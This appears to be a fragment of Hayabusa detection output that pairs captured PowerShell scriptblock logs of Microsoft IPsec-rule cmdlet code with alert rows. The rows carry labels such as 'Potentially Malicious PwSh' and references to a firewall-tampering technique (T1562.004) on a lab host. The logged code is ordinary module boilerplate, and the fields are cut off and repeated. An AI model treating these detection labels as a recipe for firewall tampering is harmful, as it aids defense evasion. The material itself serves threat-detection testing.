'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 